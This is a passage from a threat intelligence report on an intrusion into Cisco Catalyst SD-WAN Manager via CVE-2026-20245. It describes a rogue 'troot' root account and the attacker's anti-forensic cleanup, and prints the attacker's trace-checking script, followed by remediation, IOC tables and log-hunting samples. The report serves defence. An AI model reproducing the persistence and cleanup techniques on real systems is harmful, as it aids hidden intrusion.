&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Mandiant subsequently observed the threat actor accessing this new &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;troot&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account from the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;admin&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account via the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;su&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; (substitute user) command.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Anti-Forensic Techniques&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;&lt;span style="vertical-align: baseline;"&gt;Mandiant identified that the threat actor deleted all files they created, including &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;evil_tenant.csv&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and restored any system configurations they modified. These deletion and modifications were done to minimize their forensic footprint&lt;/span&gt;. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;In addition to this, Mandiant also observed execution of a validation script, which checks if indicators of the threat actor's activities are removed. &lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;for f in /home/admin/evil_tenant.csv /home/admin/.orig_vbond_vsmart_tenant_list /home/admin/.orig_vbond_vsmart_tenant_list.state /home/admin/.orig_passwd /home/admin/.orig_shadow; 
    do if [ -e "$f" ]; 
        then echo PRESENT:$f; ls -ld "$f"; 
        else echo ABSENT:$f; 
    fi; 
done; 

if grep -q '^troot:' /etc/passwd; 
    then echo PRESENT:/etc/passwd:troot; 
    else echo ABSENT:/etc/passwd:troot; 
fi; 

if [ -e /usr/share/viptela/vbond_vsmart_tenant_list ]; 
    then echo PRESENT:/usr/share/viptela/vbond_vsmart_tenant_list; ls -ld /usr/share/viptela/vbond_vsmart_tenant_list; 
    else echo ABSENT:/usr/share/viptela/vbond_vsmart_tenant_list; 
fi&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 4: Validation script&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This script checks for the presence of the following:&lt;/span&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Threat actor-created files in &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/home/admin.&lt;/code&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;troot&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; account in the &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;passwd&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; and &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;shadow&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; files.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;vbond_vsmart_tenant_list&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;, and if it exists, inspect information about the file. This is likely to check if the original file was restored.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Outlook and Implications&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;This campaign underscores the living off the edge paradigm, where threat actors prioritize the compromise of network appliances to bypass traditional security perimeters. As organizations increasingly adopt software-defined networking, the orchestrators managing these environments become primary targets. These devices offer a black box environment for threat actors: they often lack the telemetry required for deep forensic analysis, and their role as a central control plane provides a stealthy platform for persistent, wide-scale access to internal enterprise traffic. For state-sponsored actors, the ability to exploit zero-day vulnerabilities in these platforms remains a premier vector for long-term strategic intelligence collection. Google Threat Intelligence Group (GTIG) has &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/zero-days-exploited-2022"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;closely&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/2023-zero-day-trends"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;tracked&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/2024-zero-day-trends"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;and&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/2025-zero-day-review"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;reported&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; on increased zero-day exploitation of edge devices over the past several years.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Remediation and Hardening&lt;/span&gt;&lt;/h3&gt;
&lt;ul&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Perform IOC Sweep / Threat Hunting:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Collect logs and diagnostic data from SD-WAN devices by executing &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;request admin-tech&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; command on all control-plane components. Scan these collections for known IOCs and execute threat hunts focused on the TTPs identified in the Detections and Hunting section of this blog post. If true positive hits are observed, perform a full investigation.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Manual Remediation Support:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; As per Cisco’s guidance, any confirmed indicators of compromise or suspicious activity should be forwarded to &lt;/span&gt;&lt;a href="https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cisco Technical Assistance Center (TAC)&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for comprehensive review and remediation assistance.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Prioritize Immediate Patching and Upgrades:&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt; Organizations must prioritize upgrading Cisco Catalyst SD-WAN Manager to fixed software releases, specifically versions 20.9.9.2, 20.12.7.2, 20.15.4.5, 20.15.5.3, 20.18.3.1, 26.1.1.2, or later, to remediate &lt;/span&gt;&lt;a href="https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-privesc-4uxFrdzx" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;CVE-2026-20245&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;li style="vertical-align: baseline;"&gt;
&lt;p&gt;&lt;strong style="vertical-align: baseline;"&gt;Implement Cisco Catalyst SD-WAN Hardening and Logging Guidelines&lt;/strong&gt;&lt;span style="vertical-align: baseline;"&gt;: Organizations should follow the comprehensive security best practices and configuration standards detailed in the &lt;/span&gt;&lt;a href="https://sec.cloudapps.cisco.com/security/center/resources/Cisco-Catalyst-SD-WAN-HardeningGuide" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;Cisco Catalyst SD-WAN Hardening Guide&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. This guide provides a robust defense-in-depth framework for securing all SD-WAN components including the management, control, and data planes against unauthorized access.&lt;/span&gt;&lt;/p&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Indicators of Compromise (IOCs)&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;To assist the wider community in hunting and identifying activity outlined in this blog post, we have included indicators of compromise (IOCs) in a free &lt;/span&gt;&lt;a href="https://www.virustotal.com/gui/collection/d966161b93100fb8905b9b81bd03e57bbc93f21534acee88999e77798e913d5b/summary" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;GTI Collection&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; for registered users.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Network Indicators&lt;/span&gt;&lt;/h4&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Indicator&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device and exploiting CVE-2026-20245&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;126.51.108[.]152&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;76.92.245[.]217&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;207.190.37[.]94&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;23.245.7[.]178&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;153.186.231[.]233&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;167.179.79[.]189&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;45.32.38[.]160&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;IP address connecting as rogue device&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;209.137.225[.]101&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;File Indicators&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Due to the threat actor's extensive anti-forensic cleanup, several files associated with this intrusion were overwritten or deleted. However, forensic remnants of the malicious CSV payload were recovered.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="left"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Filename&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;Description&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: center;"&gt;&lt;strong style="vertical-align: baseline;"&gt;SHA256&lt;/strong&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;/home/admin/.orig_vbond_vsmart_tenant_list&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Backup configuration file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Not recovered&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;/home/admin/.orig_vbond_vsmart_tenant_list.state&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;State file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Not recovered&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;/home/admin/.orig_passwd&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Backup password file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Not recovered&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;/home/admin/.orig_shadow&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Backup password file&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Not recovered&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;/home/admin/evil_tenant.csv&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Remnant of malicious CSV file exploiting CVE-2026-20245&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;b82936f37648518425c7d3cf9e09eaffa41d7cdb3840f6a40287e3a108880f7b&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;/div&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Detections and Hunting&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Mandiant encourages organizations to conduct proactive threat hunts focused on the tactics, techniques, and procedures (TTPs) outlined in this report to identify activity that may otherwise blend into routine operations. Because certain indicators of compromises may mirror legitimate administrative actions, it is critical to assess these observations against the established network posture to minimize false positives.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;As per Cisco’s guidance, any suspicious activity or confirmed IOCs should be forwarded to the Cisco TAC for comprehensive review and assistance.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;Unauthorized SSH Connections as &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;vmanage-admin&lt;/code&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Monitor authentication logs (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/var/log/auth.log&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) for logins originating from unexpected external IP addresses using the vmanage-admin user account.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;Jan 01 07:58:00 vManage sshd[20766]: Accepted publickey for vmanage-admin from &amp;lt;Threat Actor IP&amp;gt; port 48373 ssh2: RSA SHA256:&amp;lt;redacted&amp;gt;
Jan 01 08:01:00 vManage sshd[25178]: Accepted keyboard-interactive/pam for admin from &amp;lt;Threat Actor IP&amp;gt; port 60552 ssh2&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 5: SSH from unexpected origins&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4 style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Suspicious Password Change Events&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Audit password changes in &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/var/log/auth.log&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; targeting the admin account in quick succession, particularly where credentials are set and subsequently reverted.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;Jan 01 08:00:00 vManage usermod[12345]: change user 'admin' password
Jan 01 08:15:00 vManage usermod[12345]: change user 'admin' password&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 6: Password changes&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Defenders should also inspect rollback files present within &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/var/confd/rollback/&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; for configuration delta commits targeting user passwords:&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;# Created by: vmanage-admin
# Date: 2026-01-01 08:00:00
# Via: netconf
# Type: delta
# Label: 
# Comment: 
# No: 10000
# TransactionId: 12345678
# Hostname: vManage

system {
    aaa {
        user admin {
password &amp;lt;redacted&amp;gt;;
        }
     }
 }&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 7: Rollback files&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4 style="text-align: justify;"&gt;&lt;span style="vertical-align: baseline;"&gt;Suspicious Execution of the &lt;code&gt;su&lt;/code&gt; Command&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Audit terminal command history and system logs (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;/var/log/auth.log&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) for successful switch user (&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;su&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;) executions from the admin account to unauthorized accounts (e.g., &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;troot&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;).&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;Jan 01 08:03:00 vManage su[24289]: Successful su for troot by admin&lt;/code&gt;&lt;/pre&gt;
